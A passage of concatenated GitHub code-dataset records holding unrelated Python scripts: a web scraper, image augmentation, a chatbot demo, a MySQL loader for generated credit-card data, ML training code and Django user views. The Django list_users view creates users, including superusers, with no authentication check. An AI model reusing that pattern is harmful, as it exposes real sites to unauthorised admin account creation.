Luiz': 'Luiz Felipe',\n        'Duarte Rui Mario': 'Mário Rui',\n        'Fabian Ruiz': 'Fabián',\n        'Frank Ribery': 'Franck Ribéry'\n    }\n    \n    if player in mapping:\n        return mapping[player]\n    else:\n        return player\n    \ndef remap_team(team):\n    mapping = {\n        'Milan': 'AC Milan'\n    }\n    \n    
if team in mapping:\n return mapping[team]\n else:\n return team\n\ndef get_league_teams(league_name):\n \n url = 'https://leghe.fantacalcio.it/{}/area-gioco/rose'.format(league_name)\n \n page = requests.get(url)\n soup = BeautifulSoup(page.text, 'html.parser')\n \n league_data = []\n\n team_names = soup.find_all(class_='media-heading')\n rows = soup.find_all(class_='smart-table table-striped fixed table no-margin has-subheader')\n for row, team_name in zip(rows, team_names):\n team_name = team_name.text\n\n roles = row.find_all(class_='cell-text cell-role cell-primary x1 smart-x2 mantra-x3 free-player-hidden')\n players = row.find_all(class_='player-link')\n\n for role, player in zip(roles, players):\n role = role.text\n\n name_page = requests.get(player['href'])\n soup_name = BeautifulSoup(name_page.text, 'html.parser')\n\n box = soup_name.find(class_='stickem-container')\n name = box.find(class_='img-responsive')['title'].split(' ')\n name.reverse()\n name = ' '.join(name)\n image = box.find(class_='img-responsive')['src']\n squad = box.find_all(class_='col-lg-6 col-md-6 col-sm-12 col-xs-12')[4].text.split(' ')[1]\n\n league_data.append([team_name, role, name, squad, image])\n\n league = pd.DataFrame(data=league_data, columns=['fanta_team', 'role', 'player', 'team', 'image'])\n league['player'] = league['player'].apply(lambda x: remap_player(x))\n league['team'] = league['team'].apply(lambda x: remap_team(x))\n league.to_csv('data/leghe_fantacalcio/leagues/{}.csv'.format(league_name), index=False)\n league.head()","repo_name":"Zatfer17/serie-a-lineups","sub_path":"modules/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36651995523","text":"import numpy as np\nimport os\nimport scipy.misc\nfrom scipy import ndimage\nimport scipy.ndimage\nfrom random import choice, randint\nfrom scipy.ndimage.interpolation import zoom\nnp.random.seed(123)\n\n\ndef augment_image(image):\n\tswitch = randint(0, 3)\n\n\tif switch == 0:\n\t\tblurred_image = ndimage.uniform_filter(image, size=(7, 7, 1))\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/blurred.jpg'), blurred_image)\n\t\treturn blurred_image\n\telif switch == 1:\n\t\tzoomed_image = scipy.ndimage.filters.gaussian_filter(image, 1.5)\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/zoomed.jpg'), zoomed_image)\n\t\treturn zoomed_image\n\telif switch == 2:\n\t\tflipped_image = np.fliplr(image)\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/flipped.jpg'), flipped_image)\n\t\treturn flipped_image\n\telif switch == 3:\n\t\trotation_angle = choice([randint(-70, -20), randint(20, 70)])\n\t\trotated_image = scipy.ndimage.interpolation.rotate(image, rotation_angle, mode='reflect', reshape=False)\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/rotated.jpg'), rotated_image)\n\t\treturn rotated_image\n\telse:\n\t\tblurred_image = ndimage.uniform_filter(image, size=(7, 7, 1))\n\t\treturn blurred_image\n\n\t# elif switch == 4:\n\t# \tshifted_amount = choice([randint(5.0, 13.0)])\n\t# \tshifted_image = scipy.ndimage.interpolation.shift(image, shifted_amount, mode='reflect')\n\t# \tscipy.misc.imsave(os.path.join('./', 'image_trans/rotated.jpg'), shifted_image)\n\n\nif __name__ == \"__main__\":\n\tparent_dir = '../../data/images/train/a/abbey/'\n\tim_name = '00000004.jpg'\n\timage_path = os.path.join(parent_dir, im_name)\n\timage = scipy.misc.imread(image_path)\n\taug_img = 
augment_image(image)\n# scipy.misc.imshow(image)\n\n","repo_name":"nischal225/miniplaces","sub_path":"im_aug.py","file_name":"im_aug.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38953344324","text":"#!/usr/bin/python3\n\nimport re\n\nquestions = {\n\t'is_pirate':\"Blimey! Ye landlubber still be learnin' the ropes! Every good talk starts with a hearty \\\"Arrrgh!\\\"\",\n\t'which_side':\"Good to be seein' you back.\\nDo you be lookin' to give(1) or get(2) help today?\"\n}\n\nresponses = {\n\t'is_pirate':(\n\t\t\t('a[ar]+r', True), # A proper pirate responds \"Arrrgh!\" or some variation thereof\n\t\t\t('.*', None),\n\t\t),\n\t'which_side':(\n\t\t\t('give','pirate'),\n\t\t\t('1', \t'pirate'),\n\t\t\t('get', 'victim'),\n\t\t\t('2', \t'victim'),\n\t\t\t('recieve', 'victim'),\n\t\t),\n}\n\nclass Session(object):\n\t\"\"\"Represents a user session\"\"\"\n\tqueriesProcessed = 0\n\thasOpenedWell = False\n\n\tknownData = {}\n\n\tactiveQuestion = 'is_pirate'\n\n\tdef __init__(self, name):\n\t\tsuper(Session, self).__init__()\n\t\tself.name = name\n\n\n\tdef handleQuery(self, request):\n\t\tself.queriesProcessed += 1\n\n\t\tif self.activeQuestion:\n\t\t\ttrans = self.interpretResponse(request)\n\t\t\tif trans == None:\n\t\t\t\t# We couldn't (or refused to) parse the response\n\t\t\t\treturn self.askData(self.activeQuestion)\n\n\t\tif 'is_pirate' not in self.knownData:\n\t\t\treturn self.askData('is_pirate')\n\n\t\tif 'which_side' not in self.knownData:\n\t\t\treturn self.askData('which_side')\n\n\t\treturn \"This be the end of the demo, you {}.\".format(self.knownData['which_side'])\n\n\tdef interpretResponse(self, request):\n\t\tl = responses[self.activeQuestion]\n\t\tfor patt, val in l:\n\t\t\tif re.search(patt, request.lower()):\n\n\t\t\t\tif val is not None:\n\t\t\t\t\tprint('learned {}:{}'.format(self.activeQuestion, val))\n\n\t\t\t\t\tself.knownData[self.activeQuestion] = val\n\t\t\t\t\tself.activeQuestion = None\n\n\t\t\t\treturn val\n\t\treturn None\n\n\tdef askData(self, data):\n\t\tif data in self.knownData:\n\t\t\tprint(\"Warning: {} is already known about user {}\".format(data, self.name))\n\t\tself.activeQuestion = data\n\n\t\treturn questions[data]\n\n\t\t\n\ndef main():\n\tsession = Session('testuser')\n\twhile True:\n\t\trequest = input('---> ')\n\n\t\tif not request:\n\t\t\tbreak\n\n\t\tresponse = session.handleQuery(request)\n\n\t\tif response:\n\t\t\tprint(\"\\n\"+response)\n\t\telse:\n\t\t\treturn\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"HALtheWise/pirates","sub_path":"text_handler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37838769643","text":"#!/usr/bin/env python3\n'''\nAuthor: Jason Ostrom\nDescription: This script parses the json files created from Credit Card Generator (http://ccardgenerator.com/).\nThen inserts them into a MySQL DB\n\n'''\n\nimport json\nimport pymysql\nimport datetime\n\nfiles = ['cc_data/visa.json',\n\t'cc_data/mastercard.json',\n\t'cc_data/amex.json',\n 'cc_data/discover.json'\n]\n\ndb = pymysql.Connect(\"localhost\", \"\", \"\", \"\" )\n\ndef insert_sql(vid, vnetwork, vcardnumber, vname, vaddress, vcountry, vcvv, vexp, vuser_id, vcreated_at, vupdated_at):\n\n insert_stmt = (\n \"INSERT INTO creditcards (id, network, cardnumber, name, address, country, cvv, exp, user_id, created_at, 
updated_at) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n)\n\n data = (vid, vnetwork, vcardnumber, vname, vaddress, vcountry, vcvv, vexp, vuser_id, vcreated_at, vupdated_at)\n\n try:\n with db.cursor() as cursor:\n retval = cursor.execute(insert_stmt, data)\n #print (\"Completed!: %s\" % retval)\n db.commit()\n finally:\n None\n\nindex = 1 \nfor file in files:\n\n with open(file, 'r') as f:\n data = f.read()\n\n string = data.replace(u'\\xa0', u' ')\n\n obj = json.loads(string)\n\n for i in obj:\n\n ##def insert_sql(vid, vnetwork, vcardnumber, vname, vaddress, vcountry, vcvv, vexp, vuser_id, vcreated_at, vupdated_at):\n network = i['CreditCard']['IssuingNetwork'] \n cardnumber = i['CreditCard']['CardNumber'] \n name = i['CreditCard']['Name'] \n address = i['CreditCard']['Address'] \n country = i['CreditCard']['Country'] \n cvv = i['CreditCard']['CVV'] \n exp = i['CreditCard']['Exp'] \n insert_sql(index, network, cardnumber, name, address, country, cvv, exp, 1, datetime.date(2012, 3, 23), datetime.date(2012, 3, 23))\n index += 1\n\nprint (\"Counter: %d\" % index)\ndb.close()\n","repo_name":"iknowjason/hammer","sub_path":"python_scripts/gen_creditdata.py","file_name":"gen_creditdata.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"8008708659","text":"import unittest\nfrom parameterized import parameterized\n\nfrom src.array.even_number_of_digits import EvenNumberOfDigits\n\n\nclass EvenNumberOfDigitsTest(unittest.TestCase):\n\n @parameterized.expand([\n ([0], 0),\n ([1771], 1),\n ([1772], 1),\n ([12, 345, 2, 6, 7896], 2),\n ([555, 901, 482, 1771], 1)\n ])\n def test_actual_return_against_expected(self, data, expected):\n actual = EvenNumberOfDigits().find_numbers(data)\n self.assertEqual(actual, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"msorkhpar/leetcode-learning-cards","sub_path":"Python/test/array/test_even_number_of_digits.py","file_name":"test_even_number_of_digits.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"19955531275","text":"#In this file we will load the data and train the model\nimport keras\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\n\nlabels = [\n \"red\",\n \"green\",\n \"blue\",\n \"orange\",\n \"yellow\",\n \"pink\",\n \"purple\",\n \"brown\",\n \"grey\",\n \"black\"\n]\n\n#Hyper Parameters\nNUM_EPOCHS = 500\nLEARNING_RATE = 0.2\nNUM_HIDDEN_UNITS = 16\nNUM_TRAIN = 5500\nVALIDATION_SPLIT = 0.1\n\n\ndef get_data_from_file():\n data = []\n filepath = \"clean_data.txt\"\n if not os.path.isfile(filepath):\n print(\"File path {} does not exist. 
Exiting...\".format(filepath))\n sys.exit()\n with open(filepath) as fp:\n entry = []\n for line in fp:\n word = line.split(\",\")\n r = word[0]\n g = word[1]\n b = word[2]\n label = word[3].rstrip(\"\\n\")\n entry = [r, g, b, label]\n data.append(entry)\n return data\n\ndef prepare_data(data):\n np.random.shuffle(data)\n data = np.array(data)\n\n #seperate input values\n xs = data[:,0:3]\n xs = np.divide(xs.astype(np.float), 255) #normalize\n\n #seperate label values\n ys = data[:, 3]\n ys = np.vectorize(labels.index)(ys)\n\n #seperate training data\n XTrain = xs[0:NUM_TRAIN,:]\n YTrain = ys[0:NUM_TRAIN]\n YTrain = keras.backend.one_hot(YTrain, 10)\n\n #sepearate testing data\n XTest = xs[NUM_TRAIN:, :]\n YTest = ys[NUM_TRAIN:]\n YTest = keras.backend.one_hot(YTest, 10)\n\n return XTrain, YTrain, XTest, YTest\n\ndef buildModel():\n model = keras.Sequential()\n model.add(keras.layers.Dense(units=NUM_HIDDEN_UNITS, activation='sigmoid', input_shape=[3]))\n model.add(keras.layers.Dense(units=10, activation='softmax'))\n opt = keras.optimizers.SGD(learning_rate=0.2)\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy', keras.metrics.Precision(), keras.metrics.Recall()])\n return model\n\ndef saveModelAsTFLite(model):\n converter = tf.lite.TFLiteConverter.from_keras_model(model)\n converter.post_training_quantize = True\n tflite_buffer = converter.convert()\n open( 'android/model.tflite' , 'wb' ).write( tflite_buffer )\n\ndef plotTrainingHistory(history):\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n\ndef calculateF1(precision, recall):\n return 2 * ((precision * recall)/ (precision + recall))\n\ndef displayResults(results):\n loss = results[0]\n accuracy = results[1]\n precision = results[2]\n recall = results[3]\n f1_score = calculateF1(precision, recall)\n print('\\n\\nResults from evaluating on training data: \\n')\n print('Loss', round(loss, 2))\n print('Accuracy', round(accuracy, 2))\n print('Precision: ', round(precision, 2))\n print('Recall: ', round(recall, 2))\n print('F1 Score: ', round(f1_score, 2))\n print('\\n\\n')\n\n\ndef main():\n data = get_data_from_file()\n XTrain, YTrain, XTest, YTest = prepare_data(data)\n model = buildModel()\n history = model.fit(x=XTrain,y=YTrain, epochs=NUM_EPOCHS, validation_split=VALIDATION_SPLIT) #train model\n plotTrainingHistory(history)\n displayResults(model.evaluate(x=XTrain, y=YTrain))\n displayResults(model.evaluate(x=XTest, y=YTest))\n\n\nmain()\n","repo_name":"cgmoffitt/color-classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74206108214","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\n\nclass NB:\n def fit(self, X, y):\n num_samples, num_features = X.shape\n self._classes = np.unique(y) \n num_classes = len(self._classes)\n\n self._mean = np.zeros((num_classes, num_features), dtype=np.float64)\n self._var = np.zeros((num_classes, num_features), dtype=np.float64)\n self._priors = 
np.zeros(num_classes, dtype=np.float64)\n\n        for c in self._classes:\n            X_c = X[c == y]\n            self._mean[c, :] = X_c.mean(axis=0)\n            self._var[c, :] = X_c.var(axis=0)\n            self._priors[c] = X_c.shape[0] / float(num_samples)\n\n    def predict(self, X):\n        return [self._predict(x) for x in X]\n\n    def _predict(self, x):\n        posteriors = []\n\n        for i, c in enumerate(self._classes):\n            prior = np.log(self._priors[i])\n            class_conditional = np.sum(np.log(self._pdf(i, x)))\n            posterior = prior + class_conditional\n            posteriors.append(posterior)\n\n        return self._classes[np.argmax(posteriors)]\n\n    def _pdf(self, class_i, x):\n        return 1 / np.sqrt(2 * np.pi * self._var[class_i]) * np.exp(-(x - self._mean[class_i]) ** 2 / (2 * self._var[class_i]))\n\ndef accuracy(y_true, y_pred):\n    return np.sum(y_pred == y_true) / len(y_true)\n","repo_name":"victorlisman/BasicML","sub_path":"Naive Bayes/NB.py","file_name":"NB.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16054848442","text":"import subprocess\nimport re\n\n\ndef run(cmd, callback=None):\n    curr = 0\n    total = None\n    p = subprocess.Popen(cmd, stderr=subprocess.PIPE, bufsize=1, universal_newlines=True)\n    for line in p.stderr:\n        m = re.search(r'Duration: (\\d+([:.]\\d+)+)', line)\n        if m:\n            total = 1 + time_to_secs(m.group(1))\n            if callback is not None:\n                callback(curr, total)\n\n        m = re.search(r'time=(\\d+([:.]\\d+)+)', line)\n        if m:\n            curr = time_to_secs(m.group(1))\n            if callback is not None:\n                callback(curr, total)\n\n    p.communicate()\n\n\nregex = re.compile(r'(?P<hours>\\d+):'\n                   r'(?P<min>\\d+):'\n                   r'(?P<sec>\\d+\\.\\d+)')\n\n\ndef time_to_secs(time):\n    m = re.match(regex, time)\n    parts = m.groupdict()\n    return int(parts['hours'])*3600 + int(parts['min'])*60 + float(parts['sec'])\n","repo_name":"ashutosh108/video-scripts","sub_path":"ffmpegrunner.py","file_name":"ffmpegrunner.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42128916312","text":"import uuid\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom app.models import AuthUser, AuthUserGroups, AuthGroup\nfrom django.db import transaction\nfrom django.contrib.auth.hashers import make_password\n\n\ndef list_users(request):\n    if request.method == \"POST\":\n        check_username = AuthUser.objects.filter(username=request.POST.get('username'))\n        check_email = AuthUser.objects.filter(email=request.POST.get('email'))\n        if check_email:\n            return JsonResponse({'error': True, 'msg': \"Email '{}' already exists.\".format(request.POST.get('email'))})\n        else:\n            if not check_username:\n                with transaction.atomic():\n                    user = AuthUser(\n                        first_name=request.POST.get('first_name'),\n                        middle_name=request.POST.get('middle_name'),\n                        last_name=request.POST.get('last_name'),\n                        email=request.POST.get('email'),\n                        username=request.POST.get('username'),\n                        password=make_password(request.POST.get('password')),\n                        is_superuser=True if request.POST.get('is_superuser') else False,\n                        is_staff=True if request.POST.get('is_staff') else False,\n                        is_active=1,\n                        updated_by_id=request.user.id\n                    )\n                    user.save()\n\n                    AuthUserGroups.objects.create(\n                        user_id=user.id,\n                        group_id=request.POST.get('group'),\n                    )\n                    return JsonResponse({'data': 'success', 'msg': \"New user '{}' has been added 
successfully.\".format(request.POST.get('username'))})\n return JsonResponse({'error': True, 'msg': 'Internal Error. An uncaught exception was raised.'})\n return JsonResponse({'error': True, 'msg': \"User '{}' is already existed.\".format(request.POST.get('username'))})\n\n\n\n context = {\n 'at_group': AuthGroup.objects.all(),\n }\n return render(request, 'users/list_users.html', context)\n\n\ndef edit(request,pk):\n if request.method == \"POST\":\n AuthUser.objects.filter(id=pk).update(\n first_name=request.POST.get('first_name'),\n middle_name=request.POST.get('middle_name'),\n last_name=request.POST.get('last_name'),\n )\n full_name = request.POST.get('first_name') + \" \" + request.POST.get('middle_name') + \" \" + request.POST.get('last_name')\n print(full_name)\n return JsonResponse({'data': 'success', 'msg': \"Your new Name '{}' has been updated.\".format(full_name)})\n context = {\n 'user': AuthUser.objects.filter(id=pk).first(),\n 'at_group': AuthGroup.objects.all(),\n 'user_group': AuthUserGroups.objects.filter(user_id=pk).first(),\n }\n return render(request, 'users/edit_users.html', context)","repo_name":"allennohesi/Info_kiosk","sub_path":"app/user_registration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16116788388","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 8 11:20:29 2018\n\n@author: Sirius\n\ntrain tiny imagenet on dataset representation\nTrick:\n1. 只要模型能过拟合,基本都可以调整到好的结果\n2. SGD的loss虽然可能不好看,波动率可能也大,但是最后的收敛效果可能比好\n3. 从头开始训练时,不需要加BN, dropout,weight_decay等技巧,一个一个加\n4. 输入的图像数据需要进行归一化(减均值除以方差)\n\n\n需要进行的任务:\n1. 加上weight decay 进行计算\n2. 改变优化算法rmsprop\n3. 迁移学习,将原来图像的分辨率增加,用pre-trained模型进行计算\n4. 保留最优的20个ckpt,对模型进行ensemble\n5. BN中的 \n\n增加:\n1. 
按照epoch进行递减\n\"\"\"\n\nfrom inceptionV3 import *\nfrom metrics import *\nfrom losses import *\nfrom input_pipe_aug import *\nfrom datetime import datetime\nimport numpy as np\nimport os\nimport shutil\nimport glob\nimport time\n\n\n\nclass TrainConfig(object):\n \"\"\"Training configuration\"\"\"\n batch_size = 64\n num_epochs = 100 \n \n # 测试用\n summary_interval = 250\n eval_interval = 2000 # must be integer multiple of summary_interval\n \n lr = 0.001 # tiny imagenet: decayed by 0.9 at every epoch \n reg = 0.08\n\n momentum = 0.9\n model_name = 'inception_v3'\n config_name = 'inception_v3_2'\n continue_train = False\n model = staticmethod(globals()[model_name]) # gets model by name\n\ndef options(config):\n # sirius: log and checkpoints under same directory folder\n # import os\n # from datetime import datetime\n\n now = datetime.now().strftime(\"%m%d%H%M\")\n logdir = \"run-{}/\".format(now) # log directory name\n\n model_directory = os.path.join(config.model_name, config.config_name)\n\n ckpt_path = os.path.join(model_directory, 'checkpoints')\n log_path = os.path.join(model_directory, 'logs', logdir)\n checkpoint = None\n \n if not os.path.isdir(model_directory): # if log directory not exists, create a new one\n os.makedirs(model_directory)\n return ckpt_path, log_path, checkpoint\n else:\n if not config.continue_train:\n return ckpt_path, log_path, checkpoint\n else:\n checkpoint = tf.train.latest_checkpoint(ckpt_path)\n return ckpt_path, log_path, checkpoint\n\nclass TrainControl(object):\n\n def __init__(self, lr, step):\n self.val_accs = []\n self.val_accs_5 = []\n \n self.lr = lr\n self.num_lr_updates = 0\n self.lr_factor = 1/10\n self.step = step # step\n\n def add_val_acc(self, val_accs):\n self.val_accs.append(val_accs)\n\n def add_val_acc_5(self, val_accs_5):\n self.val_accs_5.append(val_accs_5)\n\n def update_lr(self, sess, step):\n print('Inside update_lr. 
self.lr, step ', sess.run(self.lr), step)\n # sirius: 不能整除, 由于step一般都不是整数\n if step % LR_CHANGE_STEP == 0: # Note: 由于step%2000==0进入这里,这里选取的数字一定是2000的倍数\n old_lr = sess.run(self.lr)\n self.lr.load(old_lr * self.lr_factor)\n print('========================================')\n print('learning rate updates at step', step) \n print('current learning', sess.run(self.lr))\n \ndef model(images, labels, config, is_training, reuse = None):\n \n logits = config.model(images, is_training) # sirius: 只需要給模型傳入iamges和is_training\n softmax_smooth_ce_loss(logits, labels)\n acc, acc_5 = accuracy(logits, labels)\n # print('Inside train_tiny_inception, model, tf.get_collection(tf.GraphKeys.LOSSES)', tf.get_collection(tf.GraphKeys.LOSSES))\n # print('Inside train_tiny_inception, model, tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)', tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n total_loss = tf.add_n(tf.get_collection(tf.GraphKeys.LOSSES), name='total_loss')\n '''\n total_loss += tf.add_n(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES),\n name='total_loss') * config.reg\n for l2 in tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES):\n name = 'l2_loss_' + l2.name.split('/')[0]\n tf.summary.histogram(name, l2)\n '''\n\n return total_loss, acc, acc_5\n\n\ndef optimizer(loss, config):\n \"\"\"Add training operation, global_step and learning rate variable to Graph\n\n Args:\n loss: model loss tensor\n config: training configuration object\n\n Returns:\n (train_op, global_step, lr)\n \"\"\"\n lr = tf.Variable(config.lr, trainable=False, dtype=tf.float32)\n tf.summary.scalar('lr', lr) # sirius\n\n global_step = tf.Variable(0, trainable=False, name='global_step')\n\n \n optim = tf.train.MomentumOptimizer(lr, config.momentum,\n use_nesterov=True)\n train_op = optim.minimize(loss, global_step=global_step)\n\n return train_op, global_step, lr\n\ndef train():\n config = TrainConfig()\n ckpt_path, tflog_path, checkpoint = options(config)\n\n # prepare data\n g = tf.Graph()\n with g.as_default():\n \n with tf.device(':/cpu:0'):\n train_data = input_fn(True)\n val_data = input_fn(False)\n \n # feedable iterator: train data pipeline 和 validation data pipeline在一个session中\n train_iterator = train_data.make_one_shot_iterator()\n val_iterator = val_data.make_one_shot_iterator()\n\n handle = tf.placeholder(tf.string, shape=[])\n iterator = tf.data.Iterator.from_string_handle(handle, train_iterator.output_types, \n train_iterator.output_shapes)\n images, labels = iterator.get_next()\n \n # handle = tf.placeholder(tf.string, shape=[])\n # train_str, val_str, images, labels = get_samples(handle)\n #=======================================\n # training process\n # sirius: ValueError: not enough values to unpack (expected 3, got 2)\n # 问题:模型返回3个值,忘记添加acc_5\n loss, acc, acc_5 = model(images, labels, config, is_training=True)\n \n # Note: 在validation集合上需要设置is_training = False\n # Note: 在 tensorflow官网上用的estimator中有个input_fn\n # loss_val, acc_val, acc_5_val = model(images, labels, config, is_training=False)\n train_op, g_step, lr = optimizer(loss, config)\n \n \n # 没有直接summary(loss,acc,acc_5),是想要把训练集和验证集的统计数据分开\n # validation summary variables\n controller = TrainControl(lr, g_step) # save validation statistics\n # 只是定义,这里并没有给出更新规则\n val_loss = tf.Variable(0.0, trainable = False)\n val_acc = tf.Variable(0.0, trainable = False)\n val_acc_5 = tf.Variable(0.0, trainable = False)\n\n tf.summary.scalar('val_loss', val_loss)\n tf.summary.scalar('val_acc', val_acc)\n tf.summary.scalar('val_acc_5', val_acc_5)\n\n # train 
variables\n train_loss = tf.Variable(0.0, trainable = False)\n train_acc = tf.Variable(0.0, trainable = False)\n train_acc_5 = tf.Variable(0.0, trainable = False)\n\n tf.summary.scalar('train_loss', train_loss) # Note: 是这里把名字写错了,所以tensorboard画出来的图有问题\n tf.summary.scalar('train_acc', train_acc)\n tf.summary.scalar('train_acc_5', train_acc_5)\n\n # 是不包括train_init和test_init的\n init = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n [tf.summary.histogram(v.name.replace(':','_'),v) for v in tf.trainable_variables()]\n extra_updates_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n # Note: summary\n summ = tf.summary.merge_all()\n saver = tf.train.Saver(max_to_keep=5)\n writer = tf.summary.FileWriter(tflog_path, tf.get_default_graph())\n \n # train sess\n gpu_config = tf.ConfigProto()\n gpu_config.gpu_options.allow_growth = True\n \n # sirius: save summries every N step\n # summary_hook = tf.train.SummarySaverHook(save_steps=config.summary_interval,\n # output_dir=tflog_path, summary_op=tf.summary.merge_all())\n \n # with tf.train.MonitoredTrainingSession(hooks=[summary_hook]) as sess:\n with tf.Session(config = gpu_config) as sess:\n start_time = time.time()\n train_iterator_handle = sess.run(train_iterator.string_handle()) # 初始化 train 的 iterator\n val_iterator_handle = sess.run(val_iterator.string_handle()) # 初始化 test 的 iterator\n sess.run(init)\n \n if config.continue_train:\n saver.restore(sess, checkpoint)\n # for i in range(NUM_EPOCH): 这里取1时,count(step) = 156250 \n # 这里不需要,由于在dataset中已经dataset.repeat(NUM_EPOCHS)\n \n losses,accs,accs_5 = [],[],[] # 每个summary interval的平均损失\n train_count = 0\n summary_count = 0\n while True:\n try:\n for i in range(TRAIN_STEP_ALL): # 总共运行多少个step\n # Note: 如果每个step都运行sess.run(step) 太慢了\n step_loss, _, step, step_acc_5, step_acc, _ = sess.run([loss, train_op, g_step, acc_5, acc, extra_updates_ops],\n feed_dict={handle: train_iterator_handle})\n losses.append(step_loss)\n accs.append(step_acc)\n accs_5.append(step_acc_5)\n train_count += 1\n # print('train, step_acc_5', step_acc_5, 'step_acc', step_acc)\n # ======================================\n # calculate validation accuracy\n # ======================================\n # validation:\n # 1. feed_dict数据不同\n # 2. model计算时由于batch normalization需要设置为False\n # 3. 不需要更新权重参数等\n # Note: 在测试阶段,eval_interval 和 summary_inerval可以设置小一点\n # val_iterator_handle: 初始化时候也需要repeat, 或者这里重新初始化\n # 否则会报错 OutOfRangeError: End of sequence\n # Question: 在evaluation中用model进行计算,需要传参数is_training = False, 但是这样就会重复定义权重等参数\n if step % config.eval_interval == 0:\n val_losses, val_accs, val_accs_5 = [], [], [] # 在validation上的计算也是按batch进行计算的\n ckpt = saver.save(sess, ckpt_path + '/model', step) # ckpt文件,记录当前权重等\n \n for j in range(VAL_STEP): # 每进行一次validation需要多少个step\n # use trained weights to calculate outputs on validation dataset\n # 不需要给模型的参数加上reuse = True(变量共享)\n step_val_loss, step_val_acc, step_val_acc_5 = sess.run([loss, acc, acc_5],\n feed_dict={handle: val_iterator_handle})\n val_losses.append(step_val_loss)\n val_accs.append(step_val_acc)\n val_accs_5.append(step_val_acc_5)\n \n # 计算当前 eval_interval的validation\n mean_loss, mean_acc, mean_acc_5 = np.mean(val_losses), np.mean(val_accs), np.mean(val_accs_5)\n print('Step: {}, Validation. 
Loss: {:.3f}, Accuracy: {:.4f}, Accuracy_5: {:.4f}'.format(step, mean_loss, mean_acc, mean_acc_5))\n print('============================================')\n\n val_acc.load(mean_acc) # 本次evaluation计算的均值,load new value to the variable, 不会给计算图添加新的节点\n val_acc_5.load(mean_acc_5)\n val_loss.load(mean_loss)\n # controller.update_lr(sess, step) # 更新学习率\n \n if step % config.summary_interval == 0:\n # sirius: summary 需要feed_dict 否则报错\n # Error: You must feed a value for placeholder tensor 'Placeholder' with dtype string\n # summary 是 validation 数据集不够用的\n # Note: summary 这里需要加上feed_dict计算那要保存的值\n # Question: train上的accs_5都是1.0??\n # Question: summary中间用train_iterator是不是会将本身需要训练的样本也用掉了\n mean_loss, mean_acc, mean_acc_5 = np.mean(losses), np.mean(accs), np.mean(accs_5)\n train_acc.load(mean_acc) # 只有load了才会添加operation, 所以sess.run() 才有赋值,否则没有\n train_acc_5.load(mean_acc_5)\n train_loss.load(mean_loss)\n print('Iteration:{}, Training Loss:{:.3f}, Accuracy:{:.4f}, Accuracy_5:{:.4f}'.\n format(step, mean_loss,mean_acc,mean_acc_5)) # 当前summary的数据\n losses,accs,accs_5 = [],[],[] # 每个summary interval之后重置\n \n # Note: 结果是155500步骤,这里summary也用到了iterator_handle中的元素\n # writer.add_summary(sess.run(summ, feed_dict={handle: train_iterator_handle}), step)\n writer.add_summary(sess.run(summ, feed_dict={handle: train_iterator_handle}), step)\n summary_count += 1\n\n except tf.errors.OutOfRangeError:\n break\n\n print('Total time: {0} seconds.'.format(time.time()-start_time))\n print('summary_count',summary_count)\n print('train_count',train_count)\n \nif __name__ == \"__main__\":\n train()\n","repo_name":"Sirius083/tiny_imagenet","sub_path":"inception_v3/train_tiny_inception.py","file_name":"train_tiny_inception.py","file_ext":"py","file_size_in_byte":13790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71126623412","text":"#! /usr/bin/env python3\nimport re\n\ndef check_next_particle_grad_lap(mm,rel_tot,val_thr=1e-2,header='For particle'):\n \"\"\" check if particle 